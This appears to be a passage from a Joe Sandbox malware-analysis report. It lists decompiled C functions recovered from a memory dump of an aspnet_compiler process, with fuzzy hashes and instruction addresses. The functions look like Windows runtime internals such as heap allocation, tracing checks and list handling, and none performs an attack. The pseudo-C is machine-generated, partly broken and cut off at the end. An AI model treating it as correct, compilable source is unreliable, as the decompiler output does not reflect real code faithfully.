Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 75cab52de58b7162ed43ef678264d1bb5d4ddd59b3232d417beb1d7428cda6ec
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: A521B371A11205EFDF21EF58C445A6AFBF8EB54714F14846EEA4597241D370ED40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01273B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01273B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x13384c4; // 0x0
				_v12 = 1;
				_v8 =  *0x13384c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x13384c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0128AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0128FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x13384c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x13384c4; // 0x0
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x01273b89
0x01273b96
0x01273ba1
0x01273bab
0x01273bb5
0x01273bb9
0x012b6298
0x01273bbf
0x01273bc2
0x01273bc3
0x01273bc9
0x01273bca
0x01273bcc
0x01273bcd
0x01273bd4
0x01273bd6
0x01273bdb
0x01273bea
0x01273bf7
0x01273bfb
0x01273bff
0x01273c09
0x01273c0a
0x01273c0b
0x01273c0f
0x01273c14
0x01273c18
0x01273c18
0x01273bfb
0x01273c1b
0x01273c30
0x01273c30
0x01273c3d

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 427a222095c3b7beea9057f87b7358a8dbc0c8409d7a34711327e9d37d99a887
Instruction ID: 112ee6851052b876becfedd1f7fda4a19e5de5df171c2146b9962cf70ebf817c
Opcode Fuzzy Hash: 427a222095c3b7beea9057f87b7358a8dbc0c8409d7a34711327e9d37d99a887
Instruction Fuzzy Hash: 6321D1B2A10109AFC710DF58DD81F6ABBBDFB40308F1501A8FA09AB251D371ED01DB94

Uniqueness

Uniqueness Score: -1.00%

Function 012C6CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E012C6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01267D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01267D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1225c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0127F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0127F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E012C7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01262400( &_v52);
								}
								_t21 = L01262400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x012c6cfb
0x012c6d00
0x012c6d02
0x012c6d06
0x012c6d0a
0x012c6d0e
0x012c6d19
0x012c6d2b
0x012c6d1b
0x012c6d24
0x012c6d24
0x012c6d33
0x012c6d39
0x012c6d46
0x012c6d4f
0x012c6d61
0x012c6d51
0x012c6d5a
0x012c6d5a
0x012c6d69
0x012c6d6b
0x012c6d6d
0x012c6d6f
0x012c6d6f
0x012c6d74
0x012c6d79
0x012c6d7a
0x012c6d7f
0x012c6d82
0x012c6d88
0x012c6d89
0x012c6d90
0x012c6d94
0x012c6da7
0x012c6db1
0x012c6db1
0x012c6dbb
0x012c6dbb
0x012c6d90
0x012c6d69
0x012c6d46
0x012c6dc6

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 101b553afe18d779977558ec16d57ca43665d036be6f916ae19e938a3af89b60
Instruction ID: e040441149246cac4b2311cbb064509adeafc5ee14be5b5479805183a78ade77
Opcode Fuzzy Hash: 101b553afe18d779977558ec16d57ca43665d036be6f916ae19e938a3af89b60
Instruction Fuzzy Hash: 2321F8725247469FD311DF28C944B67BBECEF91A44F040A5AFB40C7351E734C588C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0131070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0131070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E013107DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0130AFDE( &_v8,  &_v12);
					E01311293(_t38, _v28, _t60);
					if(E01267D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E013014FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0131071b
0x01310724
0x01310734
0x01310738
0x0131074b
0x0131074b
0x01310753
0x01310753
0x01310759
0x0131075d
0x01310774
0x01310779
0x0131077d
0x01310789
0x01310795
0x013107a7
0x01310797
0x013107a0
0x013107a0
0x013107af
0x013107c4
0x013107cd
0x013107cd
0x013107af
0x013107dc

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: ef7f8cd5de5675e0207904ed9e05a0ba9e956ee755682f52b9f30497b50ec3a7
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: DD21F2362042049FD709DF2CCC90AAABBA5EBD4354F048569F9959B385D730D949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012C7794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E012C7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1337b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0128F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01267D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01289AE0();
					_t24 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x012c7799
0x012c779a
0x012c779b
0x012c77a3
0x012c77ab
0x012c77ae
0x012c77b1
0x012c77b1
0x012c77bf
0x012c77c4
0x012c77c8
0x012c77ce
0x012c77d4
0x012c77e0
0x012c77e0
0x012c77d6
0x012c77d6
0x012c77de
0x00000000
0x00000000
0x012c77de
0x012c77e5
0x012c77f0
0x012c77f3
0x012c77f6
0x012c77fd
0x012c7800
0x012c780c
0x012c7818
0x012c782b
0x012c781a
0x012c7823
0x012c7823
0x012c7830
0x012c7831
0x012c7838
0x012c783d
0x012c783e
0x012c784f
0x012c784f
0x012c785a

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd54a9c7d0c728571efc3fb01027ffe1c4de3b8b127803828b7edd7144f7ea37
Instruction ID: b743c826dbd8e61ab694dce422b6ea943cfb9dc55818d8374eae32627c2dce68
Opcode Fuzzy Hash: bd54a9c7d0c728571efc3fb01027ffe1c4de3b8b127803828b7edd7144f7ea37
Instruction Fuzzy Hash: EA219F72510645AFC725DF69D890E6BBBADEF48740F10066DE70AC7690D634E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0126AE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0126AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01267D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01267D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01267D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01267D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E012C7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0126ae78
0x0126ae7c
0x0126ae7e
0x0126ae81
0x0126ae86
0x0126ae8d
0x012b2691
0x0126ae93
0x0126ae93
0x0126ae93
0x0126ae98
0x0126ae9d
0x012b26a2
0x012b26b4
0x012b26a4
0x012b26ad
0x012b26ad
0x012b26b9
0x00000000
0x012b26bb
0x00000000
0x012b26bb
0x0126aea3
0x0126aea3
0x0126aea3
0x0126aeaa
0x012b26c0
0x012b26c9
0x012b26c9
0x0126aeb3
0x012b26d4
0x012b26e1
0x00000000
0x00000000
0x012b26e7
0x012b26ee
0x012b26f0
0x012b26f9
0x012b26f9
0x012b2702
0x012b2708
0x012b2708
0x012b270b
0x012b270f
0x012b2711
0x012b2711
0x012b2725
0x012b2725
0x00000000
0x0126aeb9
0x0126aeb9
0x0126aebf
0x0126aebf
0x0126aeb3

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: d1a752706481e3fb7e9345c808b35a3f4bc521aa4ff8a355f8131a6518b2c34f
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 1A21D432631682DFE7169B29C984B7577E8EF54784F1904A0DE049B692D774EC80C690

Uniqueness

Uniqueness Score: -1.00%

Function 0127FD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0127FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E012576E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0127fd9b
0x0127fda0
0x0127fda1
0x0127fdab
0x0127fdad
0x0127fdb0
0x0127fdb8
0x0127fe0f
0x0127fde6
0x0127fde9
0x0127fdec
0x012bc0c0
0x0127fdfe
0x0127fe06
0x0127fe06
0x012bc0c8
0x0127fe2d
0x0127fe2d
0x00000000
0x0127fe2d
0x012bc0d1
0x012bc0e0
0x012bc0e5
0x012bc0e5
0x012bc0e8
0x00000000
0x012bc0e8
0x0127fdf4
0x00000000
0x00000000
0x0127fdf6
0x0127fdfa
0x0127fe1a
0x0127fe1f
0x0127fe1f
0x0127fdfc
0x00000000
0x0127fdfc
0x0127fdcc
0x0127fdd0
0x0127fe26
0x00000000
0x0127fe26
0x0127fdd8
0x0127fddb
0x0127fddd
0x0127fde0
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: a53d38b76fb27f8ee9276a503867b69f01e60234328b4042969e0e708a6309ed
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 2A21AC72628A42DFD735CF0DC640E63B7E5EB95B10F21847EEA6587611D7309C00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0127B390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0127B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01262280(_t12, 0x1338608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E012800C2(0x1338608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0127b395
0x0127b3a2
0x0127b3a5
0x0127b3aa
0x0127b3b2
0x0127b3ba
0x0127b3bd
0x0127b3c0
0x0127b3c4
0x0127b3c9
0x012ba3e9
0x012ba3ed
0x012ba3f0
0x012ba3ff
0x012ba403
0x012ba409
0x00000000
0x00000000
0x012ba40b
0x012ba40b
0x012ba40f
0x012ba415
0x012ba423
0x012ba423
0x012ba415
0x0127b3d1
0x0127b3e8
0x0127b3e8
0x0127b3d9

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333e9a8b07e806c998513dd0680c9d15525ef93ef6ae2e2decfe6dfbfe03fe9b
Instruction ID: c6ca16c04eff568253ade381051b92c8706f8a7aa9e2f092482b42e67d8206fb
Opcode Fuzzy Hash: 333e9a8b07e806c998513dd0680c9d15525ef93ef6ae2e2decfe6dfbfe03fe9b
Instruction Fuzzy Hash: 49116B373361119BCB299B198D81A6B725AEBC5370B240129EE16C73C0CA799C46C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 01249240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01249240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x131f708);
				E0129D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E012895D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E012895D0();
				_t33 =  *0x13384c4; // 0x0
				L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x13384c4; // 0x0
				L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x13384c4; // 0x0
				E01262280(L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x13386b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E012895D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E012895D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01249325();
					_t50 =  *0x13384c4; // 0x0
					return E0129D0D1(L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x01249240
0x01249242
0x01249247
0x0124924c
0x0124924e
0x01249255
0x01249257
0x0124925a
0x0124925f
0x0124925f
0x01249266
0x01249271
0x01249276
0x01249279
0x0124927e
0x01249295
0x0124929a
0x012492b1
0x012492b6
0x012492d7
0x012492dc
0x012492e0
0x012492e6
0x012492e8
0x012492ee
0x01249332
0x01249333
0x01249337
0x01249338
0x0124933a
0x0124933a
0x0124933d
0x01249342
0x01249342
0x01249345
0x01249349
0x0124934e
0x01249352
0x01249357
0x012492f4
0x012492f4
0x012492f6
0x012492f9
0x01249300
0x01249306
0x01249324
0x01249324

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 221a5ceafb07eef507bbd0e1f005ab8c9000e1f5bd9029d32dabf81727270f67
Instruction ID: 73620cb420013d0aa1aa426ae320048813b0d1ad627c4d3dc619edd99be8926c
Opcode Fuzzy Hash: 221a5ceafb07eef507bbd0e1f005ab8c9000e1f5bd9029d32dabf81727270f67
Instruction Fuzzy Hash: B4214131061601DFCB26EF68DA40F26B7F9FF18708F14456CE14A97AA1C739E981DB44

Uniqueness

Uniqueness Score: -1.00%

Function 012D4257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E012D4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x13208d0);
				E0129D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E012D41E8(__ebx, __edi, __ecx, _t39);
				E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x13387e4;
					_t18 =  *0x13387e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1335cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x13387e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x13387e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01247055(_t31 + 0xfffffff8);
								_t24 =  *0x13387e0; // 0x0
								_t18 = _t24 - 1;
								 *0x13387e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1335cd0;
				if( *0x1335cd0 <= 0) {
					L01247055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x13387e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x13387e8 = _t30;
						 *0x13387e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0129D0D1(L012D4320());
			}

0x012d4257
0x012d4257
0x012d4257
0x012d4259
0x012d425e
0x012d4263
0x012d4265
0x012d4273
0x012d4278
0x012d427c
0x012d427f
0x012d4281
0x012d4287
0x012d42d7
0x012d42d7
0x012d42da
0x012d428d
0x012d428d
0x012d428f
0x012d4292
0x012d4297
0x012d429c
0x012d42a0
0x012d42a6
0x012d42a8
0x012d42ae
0x012d42b3
0x00000000
0x012d42ba
0x012d42ba
0x012d42bf
0x012d42c5
0x012d42ca
0x012d42cf
0x012d42d0
0x00000000
0x012d42d0
0x012d42b3
0x00000000
0x012d42a6
0x012d429c
0x012d42dc
0x012d42dc
0x012d42e3
0x012d4309
0x012d42e5
0x012d42e5
0x012d42e8
0x012d42ee
0x012d42f0
0x00000000
0x012d42f2
0x012d42f2
0x012d42f4
0x012d42f7
0x012d42f9
0x012d4300
0x012d4300
0x012d42f0
0x012d430e
0x012d431f

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992833a18ebc02911f084a32e32e7b17b8d97f7f2e41f1f307f2c7070edbbe63
Instruction ID: d5aced4a05e5a15cf756a49ffa521241a06f4001a0c86d00a451e2d86d02dd0a
Opcode Fuzzy Hash: 992833a18ebc02911f084a32e32e7b17b8d97f7f2e41f1f307f2c7070edbbe63
Instruction Fuzzy Hash: E0219070521742CFCB26EF68D044624BBF6FF85354F2082AED2158BA65DB31E552CF84

Uniqueness

Uniqueness Score: -1.00%

Function 01272397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E01272397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x133848c != 0) {
					L0126FAD0(0x1338610);
					if( *0x133848c == 0) {
						E0126FA00(0x1338610, _t19, _t27, 0x1338610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01272581(0x1338610, 0x12250a0, _t26, _t27, _t28);
